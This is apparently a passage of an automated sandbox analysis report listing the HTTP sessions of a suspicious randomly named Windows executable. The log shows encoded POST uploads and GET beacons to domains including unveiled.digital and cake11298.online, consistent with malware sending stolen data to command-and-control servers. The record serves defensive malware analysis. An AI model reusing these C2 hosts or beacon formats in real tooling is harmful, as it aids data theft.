                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              17192.168.2.4497593.33.130.190805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:41.497684002 CEST704OUTPOST /swnk/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.unveiled.digital
                                                              Origin: http://www.unveiled.digital
                                                              Referer: http://www.unveiled.digital/swnk/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 56 4b 41 2f 57 70 45 48 54 57 49 50 37 54 53 5a 52 63 63 59 34 52 35 65 77 71 71 6e 52 59 4e 45 72 44 43 53 4a 63 5a 66 7a 4d 54 6c 41 4b 73 61 47 6d 33 47 54 6d 44 54 37 46 6c 73 46 6a 37 66 54 75 31 62 61 6d 59 64 31 64 47 43 42 6a 56 75 58 6c 51 72 66 4e 53 34 45 6b 2b 5a 49 4a 79 65 47 62 69 43 38 58 37 7a 72 77 71 49 66 4a 64 58 73 73 43 69 47 6c 66 47 59 59 4b 38 72 4c 48 68 49 76 30 6b 53 4a 5a 56 76 72 35 2b 4f 4a 71 2b 6e 5a 4e 59 51 4f 67 35 42 4e 62 74 31 45 73 46 6b 53 61 6e 2f 4b 46 6b 74 34 79 38 32 41 63 54 42 58 30 6e 33 58 68 76 63 32 4e 77 71 68 47 4b 67 67 3d 3d
                                                              Data Ascii: 3tV=VKA/WpEHTWIP7TSZRccY4R5ewqqnRYNErDCSJcZfzMTlAKsaGm3GTmDT7FlsFj7fTu1bamYd1dGCBjVuXlQrfNS4Ek+ZIJyeGbiC8X7zrwqIfJdXssCiGlfGYYK8rLHhIv0kSJZVvr5+OJq+nZNYQOg5BNbt1EsFkSan/KFkt4y82AcTBX0n3Xhvc2NwqhGKgg==


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              18192.168.2.4497603.33.130.190805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:44.043433905 CEST724OUTPOST /swnk/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.unveiled.digital
                                                              Origin: http://www.unveiled.digital
                                                              Referer: http://www.unveiled.digital/swnk/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 56 4b 41 2f 57 70 45 48 54 57 49 50 39 44 69 5a 54 2f 30 59 74 68 35 64 38 4b 71 6e 45 49 4d 44 72 44 47 53 4a 59 49 53 30 2b 6e 6c 46 62 63 61 42 6e 33 47 65 47 44 54 77 6c 6c 6a 42 6a 37 51 54 75 35 70 61 6b 63 64 31 64 43 43 42 6a 6c 75 58 57 6f 6f 64 64 53 36 4f 30 2b 68 4d 4a 79 65 47 62 69 43 38 54 61 63 72 77 79 49 65 35 74 58 75 4e 43 68 4c 46 66 42 62 59 4b 38 76 4c 48 6c 49 76 30 61 53 4c 73 64 76 70 42 2b 4f 49 61 2b 67 4d 78 66 61 4f 67 2f 50 74 61 73 6c 30 42 31 6b 77 58 37 32 72 56 52 6b 4b 66 65 2b 6d 4e 4a 51 6d 56 77 6c 58 46 63 42 78 45 45 6e 69 37 44 37 72 5a 4d 6c 6d 4e 34 35 32 78 4d 4f 52 4f 36 75 6f 52 35 64 65 4d 3d
                                                              Data Ascii: 3tV=VKA/WpEHTWIP9DiZT/0Yth5d8KqnEIMDrDGSJYIS0+nlFbcaBn3GeGDTwlljBj7QTu5pakcd1dCCBjluXWooddS6O0+hMJyeGbiC8TacrwyIe5tXuNChLFfBbYK8vLHlIv0aSLsdvpB+OIa+gMxfaOg/Ptasl0B1kwX72rVRkKfe+mNJQmVwlXFcBxEEni7D7rZMlmN452xMORO6uoR5deM=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              19192.168.2.4497613.33.130.190805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:46.591907978 CEST10806OUTPOST /swnk/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.unveiled.digital
                                                              Origin: http://www.unveiled.digital
                                                              Referer: http://www.unveiled.digital/swnk/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 56 4b 41 2f 57 70 45 48 54 57 49 50 39 44 69 5a 54 2f 30 59 74 68 35 64 38 4b 71 6e 45 49 4d 44 72 44 47 53 4a 59 49 53 30 2b 66 6c 46 4a 6b 61 42 45 76 47 66 47 44 54 35 46 6b 6b 42 6a 37 33 54 74 4a 74 61 6b 51 6e 31 65 71 43 51 79 46 75 54 58 6f 6f 48 4e 53 36 41 6b 2b 61 49 4a 79 4c 47 62 7a 4c 38 58 2b 63 72 77 79 49 65 2f 4a 58 70 63 43 68 4e 46 66 47 59 59 4b 77 72 4c 47 36 49 76 38 4b 53 4c 34 4e 76 39 39 2b 4f 6f 4b 2b 68 2b 5a 66 41 4f 67 39 43 4e 62 2f 6c 30 4e 71 6b 77 37 33 32 72 67 4b 6b 4c 6e 65 36 79 73 6a 4e 55 6c 6d 7a 47 42 53 61 47 6f 6a 35 51 6a 65 2b 4b 77 32 72 54 42 30 6d 79 6c 61 4f 77 69 33 78 49 52 68 4d 62 57 76 5a 54 56 33 74 55 64 68 6b 66 64 77 73 57 57 76 51 55 63 74 37 78 36 72 55 50 30 55 62 36 53 6e 4b 50 49 62 46 6a 44 62 35 4d 6f 6d 73 54 6f 52 43 73 44 45 6c 55 65 2f 50 55 5a 6e 42 31 61 4b 45 70 37 64 76 42 5a 46 62 69 63 50 39 47 46 31 30 6b 67 55 76 38 51 30 75 58 31 58 79 2f 32 38 64 67 35 2b 6d 70 66 6e 50 79 7a 66 58 61 52 63 36 34 4e 68 51 36 [TRUNCATED]
                                                              Data Ascii: 3tV=VKA/WpEHTWIP9DiZT/0Yth5d8KqnEIMDrDGSJYIS0+flFJkaBEvGfGDT5FkkBj73TtJtakQn1eqCQyFuTXooHNS6Ak+aIJyLGbzL8X+crwyIe/JXpcChNFfGYYKwrLG6Iv8KSL4Nv99+OoK+h+ZfAOg9CNb/l0Nqkw732rgKkLne6ysjNUlmzGBSaGoj5Qje+Kw2rTB0mylaOwi3xIRhMbWvZTV3tUdhkfdwsWWvQUct7x6rUP0Ub6SnKPIbFjDb5MomsToRCsDElUe/PUZnB1aKEp7dvBZFbicP9GF10kgUv8Q0uX1Xy/28dg5+mpfnPyzfXaRc64NhQ6G+z3EUeJG6Fx3SI2fL6YImnLAIJm9q4vLa6wMuDWiJQ56oFk1q6AwOGd5z8mVJeEbi+03cOXy+W66upl8KmDA3edKh6SS1HPSx5/oWymxzMPkra/1Z1mDypOkADNLqEBLWbV9k217xn7FH6oGBQ5NAn+lYMHTsPt8I1tQJJg28jVNoUOfYUOnyUYhqwuwZsdTAZz3SrhmZ6AiBVP/3viwwQL2rO2U4NwUCuzjtsBR/YcOOJrGt4Y2Vl1tX4Z2U+LCHzlOiGlMreRvYpQTf6CZKANXFPwvyt4pWezJ/ncqRg5HCearFi1in+s4hfuVa937fJNpK34IxCJxN047ilhA8v3gcuD01v2EXnBBIJOYcFrJygA9WA/7TratLJbCBk7rVQwVfLGjOFxVZo7lmnz4r8MFnmWXLMC2PvDWT8AMER/tSekmDs/v/NbB22LSA99GX/85RtjoWjagTzwXwh9EMwAPc5VkLnfXbXJTzTcN7jPg3OfPplIc7owHLttEyr3Lgo9/IdAsy/FFUdW2dvM8Gco94KOloMannEOKKctRhBmR3gmAIEVf6tSx9HyIEMnDJEplrUV7TBFKDbtHRG1O2WsTnPjtTyBEXrirTs4nx71f+iHUjhteSR9NmalUGvnd7y2qm3c9kCP1ZNtKCLD59KWFoxe/iKgzE [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              20192.168.2.4497623.33.130.190805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:49.136720896 CEST435OUTGET /swnk/?3tV=YIofVfs+RVMTlTiIWsRg/2NG6LSwccZ17VOMMr8T7NjJGKpRQCPlXVPp8EduD1P6e8BrQW5t6vS2RBJAYjg4WvzfcnuaE4r1Crjp7jLNpS7ccpgL3d7XEEo=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.unveiled.digital
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:06:49.589215040 CEST398INHTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Thu, 12 Sep 2024 13:06:49 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 74 56 3d 59 49 6f 66 56 66 73 2b 52 56 4d 54 6c 54 69 49 57 73 52 67 2f 32 4e 47 36 4c 53 77 63 63 5a 31 37 56 4f 4d 4d 72 38 54 37 4e 6a 4a 47 4b 70 52 51 43 50 6c 58 56 50 70 38 45 64 75 44 31 50 36 65 38 42 72 51 57 35 74 36 76 53 32 52 42 4a 41 59 6a 67 34 57 76 7a 66 63 6e 75 61 45 34 72 31 43 72 6a 70 37 6a 4c 4e 70 53 37 63 63 70 67 4c 33 64 37 58 45 45 6f 3d 26 49 68 6b 54 62 3d 78 50 66 48 47 30 6f 38 6b 5a 49 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3tV=YIofVfs+RVMTlTiIWsRg/2NG6LSwccZ17VOMMr8T7NjJGKpRQCPlXVPp8EduD1P6e8BrQW5t6vS2RBJAYjg4WvzfcnuaE4r1Crjp7jLNpS7ccpgL3d7XEEo=&IhkTb=xPfHG0o8kZI8"}</script></head></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              21192.168.2.449763185.199.108.153805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:54.656380892 CEST704OUTPOST /7ew2/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.cake11298.online
                                                              Origin: http://www.cake11298.online
                                                              Referer: http://www.cake11298.online/7ew2/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 46 43 6e 70 6b 6c 4b 2b 47 50 4d 4b 4d 61 37 6b 4b 32 2b 76 6e 74 32 32 68 6a 2f 39 59 64 52 39 46 32 6b 53 52 34 4f 48 4a 69 43 65 38 51 35 6d 4f 79 69 42 72 6a 46 4c 54 30 44 30 78 39 79 75 43 41 49 4b 6f 50 30 43 47 2f 48 46 68 74 54 43 78 6f 45 6e 63 49 56 49 58 4f 71 65 34 6e 6d 37 46 2f 52 67 4f 42 69 6b 58 4c 6e 36 42 76 66 47 7a 75 6c 34 44 34 61 4e 45 7a 41 4b 50 4a 31 36 67 6f 47 4c 4b 37 74 4a 43 70 43 31 4f 2f 43 4a 6d 65 66 43 71 6d 65 68 61 56 51 61 76 55 4a 46 69 45 7a 54 30 57 30 4a 2b 2f 62 36 70 66 55 2f 31 64 31 77 51 31 58 5a 66 6c 43 2b 53 58 59 45 4c 51 3d 3d
                                                              Data Ascii: 3tV=FCnpklK+GPMKMa7kK2+vnt22hj/9YdR9F2kSR4OHJiCe8Q5mOyiBrjFLT0D0x9yuCAIKoP0CG/HFhtTCxoEncIVIXOqe4nm7F/RgOBikXLn6BvfGzul4D4aNEzAKPJ16goGLK7tJCpC1O/CJmefCqmehaVQavUJFiEzT0W0J+/b6pfU/1d1wQ1XZflC+SXYELQ==
                                                              Sep 12, 2024 15:06:55.290832043 CEST488INHTTP/1.1 405 Method Not Allowed
                                                              Connection: close
                                                              Content-Length: 131
                                                              Server: Varnish
                                                              Retry-After: 0
                                                              Accept-Ranges: bytes
                                                              Date: Thu, 12 Sep 2024 13:06:55 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-ewr-kewr1740066-EWR
                                                              X-Cache: MISS
                                                              X-Cache-Hits: 0
                                                              X-Timer: S1726146415.053361,VS0,VE0
                                                              X-Fastly-Request-ID: 3456b0b95e875b7f7acc72f7c190dabc6ce956f7
                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              22192.168.2.449764185.199.108.153805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:57.204737902 CEST724OUTPOST /7ew2/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.cake11298.online
                                                              Origin: http://www.cake11298.online
                                                              Referer: http://www.cake11298.online/7ew2/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 46 43 6e 70 6b 6c 4b 2b 47 50 4d 4b 65 70 7a 6b 49 58 2b 76 68 4e 32 31 6b 6a 2f 39 52 39 51 30 46 32 6f 53 52 35 37 59 4a 58 71 65 39 79 68 6d 50 7a 69 42 6e 44 46 4c 42 55 44 78 2b 64 7a 44 43 41 56 2f 6f 4f 49 43 47 2f 37 46 68 6f 58 43 78 62 38 6f 4f 6f 56 4b 62 75 71 51 32 48 6d 37 46 2f 52 67 4f 42 47 61 58 4c 76 36 47 65 76 47 68 4b 4a 37 64 6f 61 4b 46 7a 41 4b 5a 35 30 53 67 6f 47 54 4b 36 77 6b 43 72 36 31 4f 2b 53 4a 6d 4c 2b 55 6b 6d 65 6e 55 31 52 58 2f 56 77 37 6a 31 61 45 33 46 34 4f 33 75 37 36 6c 35 46 6c 6b 73 55 6e 43 31 7a 71 43 69 4c 4b 66 55 6c 4e 51 58 38 34 41 61 50 4b 4c 63 6d 34 38 4c 5a 55 41 33 68 62 58 47 38 3d
                                                              Data Ascii: 3tV=FCnpklK+GPMKepzkIX+vhN21kj/9R9Q0F2oSR57YJXqe9yhmPziBnDFLBUDx+dzDCAV/oOICG/7FhoXCxb8oOoVKbuqQ2Hm7F/RgOBGaXLv6GevGhKJ7doaKFzAKZ50SgoGTK6wkCr61O+SJmL+UkmenU1RX/Vw7j1aE3F4O3u76l5FlksUnC1zqCiLKfUlNQX84AaPKLcm48LZUA3hbXG8=
                                                              Sep 12, 2024 15:06:57.637331963 CEST488INHTTP/1.1 405 Method Not Allowed
                                                              Connection: close
                                                              Content-Length: 131
                                                              Server: Varnish
                                                              Retry-After: 0
                                                              Accept-Ranges: bytes
                                                              Date: Thu, 12 Sep 2024 13:06:57 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-nyc-kteb1890078-NYC
                                                              X-Cache: MISS
                                                              X-Cache-Hits: 0
                                                              X-Timer: S1726146418.591980,VS0,VE0
                                                              X-Fastly-Request-ID: 473839501002306211b20a7d1c7aff1d5782fcdd
                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              23192.168.2.449765185.199.108.153805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:59.751956940 CEST10806OUTPOST /7ew2/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.cake11298.online
                                                              Origin: http://www.cake11298.online
                                                              Referer: http://www.cake11298.online/7ew2/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 46 43 6e 70 6b 6c 4b 2b 47 50 4d 4b 65 70 7a 6b 49 58 2b 76 68 4e 32 31 6b 6a 2f 39 52 39 51 30 46 32 6f 53 52 35 37 59 4a 52 79 65 39 48 31 6d 4f 51 36 42 6b 44 46 4c 61 55 44 77 2b 64 7a 37 43 41 4e 37 6f 4f 46 31 47 35 2f 46 6a 4b 66 43 33 71 38 6f 58 59 56 4b 54 4f 71 64 34 6e 6d 55 46 2f 42 61 4f 42 57 61 58 4c 76 36 47 64 33 47 6b 75 6c 37 66 6f 61 4e 45 7a 41 38 50 4a 30 70 67 6f 4f 44 4b 36 31 5a 43 62 61 31 4f 65 69 4a 71 59 57 55 73 6d 65 6c 54 31 51 45 2f 55 4d 65 6a 31 47 49 33 47 6b 6f 33 75 50 36 32 4f 49 46 68 38 55 37 64 30 6a 6c 61 6a 7a 2b 58 54 64 73 51 57 4e 64 4a 2b 72 45 5a 66 6e 58 37 4b 4d 37 5a 6d 41 5a 4a 79 2f 51 48 41 65 65 56 33 6b 4a 42 70 54 4d 52 75 67 50 70 6a 6c 57 69 53 44 5a 6d 46 37 58 4e 43 74 39 53 68 44 57 65 45 43 6e 79 57 71 74 43 71 56 53 57 50 31 70 36 65 74 2f 49 72 59 74 77 62 57 79 49 68 76 37 69 6c 4c 41 66 2b 4e 6f 4a 76 49 6b 50 74 35 56 62 61 49 33 6b 44 56 2f 56 50 51 38 63 4e 75 2f 56 47 65 50 48 68 30 39 52 68 77 51 65 4f 56 67 4e 61 [TRUNCATED]
                                                              Data Ascii: 3tV=FCnpklK+GPMKepzkIX+vhN21kj/9R9Q0F2oSR57YJRye9H1mOQ6BkDFLaUDw+dz7CAN7oOF1G5/FjKfC3q8oXYVKTOqd4nmUF/BaOBWaXLv6Gd3Gkul7foaNEzA8PJ0pgoODK61ZCba1OeiJqYWUsmelT1QE/UMej1GI3Gko3uP62OIFh8U7d0jlajz+XTdsQWNdJ+rEZfnX7KM7ZmAZJy/QHAeeV3kJBpTMRugPpjlWiSDZmF7XNCt9ShDWeECnyWqtCqVSWP1p6et/IrYtwbWyIhv7ilLAf+NoJvIkPt5VbaI3kDV/VPQ8cNu/VGePHh09RhwQeOVgNazygEudKAzSffLu6xjQSFPzgQYI3+alF6bwTViJ8k2phKXrCrp6DeBh6127LNNQVg0nWzRAFbPpTY5E8XZhtS4F/WTHVBzY6SWdgflyjRRWjVEKZfs9hpzdE8ZmU18dsG56wBUra9r3pG3QCV4oMTFIylFQmu6dFQP2F4wFIKpIUsTj0yjkyBSz05FXK5xPH1G1exZtVbGqi5wBA4YJiIvyR95iuVsSZGQrWMu7NxX6W/CuJgU+AsnO9DLFUjCajvJfgd6CBU1SMc7mBfBIK5RUnwkASxWyE8FfRKYFAfG5g0aZxpTihghCggeh1qAqNRNcPSLxUm9XBQocQ9sxVNldQikGQXIsdyXhDEbvQj4urLyhn/HE53KsEXym+fpTCzZK9YJr/SfbOIlOHjHFb9RFK2ES4+cSlDz7QHlSzj0MaYZWT2Wy+Kuc/KZ8pFO+AcazypArtH8cDSeQFN9uNuMcbqhah7Cmsi8gY2gcp0YltMP3huEOScZwYMCSHQ+aftekXtDzZgNvGtF8hefXm/DUBa2YCcmpKZshsQnEdmGsx+n1XHtvKqbAmMvHzfymVZ6qjuO11NkkIUwHQEMOjckxbgEXAqkL5guCSSQQu5NYIIOtlhDcI6t+rMRPHbv+rDV7dDptNJH2b5i5INQWok4L1F3yfvQ6HiXM [TRUNCATED]
                                                              Sep 12, 2024 15:07:00.195352077 CEST488INHTTP/1.1 405 Method Not Allowed
                                                              Connection: close
                                                              Content-Length: 131
                                                              Server: Varnish
                                                              Retry-After: 0
                                                              Accept-Ranges: bytes
                                                              Date: Thu, 12 Sep 2024 13:07:00 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-ewr-kewr1740051-EWR
                                                              X-Cache: MISS
                                                              X-Cache-Hits: 0
                                                              X-Timer: S1726146420.148075,VS0,VE1
                                                              X-Fastly-Request-ID: 56e8f6532db92e286954e50b99dfcbc3264bb94e
                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              24192.168.2.449766185.199.108.153805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:07:02.288429022 CEST435OUTGET /7ew2/?IhkTb=xPfHG0o8kZI8&3tV=IAPJnQ6xP9g+To7sKnTlpdONgQ/IZpMKDV4JVaWfPzS1iBgaX2aSuicPSUKP+tbyByJ2nvQBfa7E+7/p3v0hf5xqKOi6z2fPcNVZO3WzTaW3LMTOzeMZHpQ= HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.cake11298.online
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:07:02.760704041 CEST804INHTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              Content-Length: 162
                                                              Server: GitHub.com
                                                              Content-Type: text/html
                                                              X-GitHub-Request-Id: 73BF:7FAD7:91171E7:9EA1E19:66E2E776
                                                              Accept-Ranges: bytes
                                                              Age: 0
                                                              Date: Thu, 12 Sep 2024 13:07:02 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-ewr-kewr1740053-EWR
                                                              X-Cache: MISS
                                                              X-Cache-Hits: 0
                                                              X-Timer: S1726146423.701862,VS0,VE9
                                                              Vary: Accept-Encoding
                                                              X-Fastly-Request-ID: 87133c0211b80c48bed4e7672ef5169d6fa48201
                                                              Location: http://cake11298.online/7ew2/?IhkTb=xPfHG0o8kZI8&3tV=IAPJnQ6xP9g+To7sKnTlpdONgQ/IZpMKDV4JVaWfPzS1iBgaX2aSuicPSUKP+tbyByJ2nvQBfa7E+7/p3v0hf5xqKOi6z2fPcNVZO3WzTaW3LMTOzeMZHpQ=
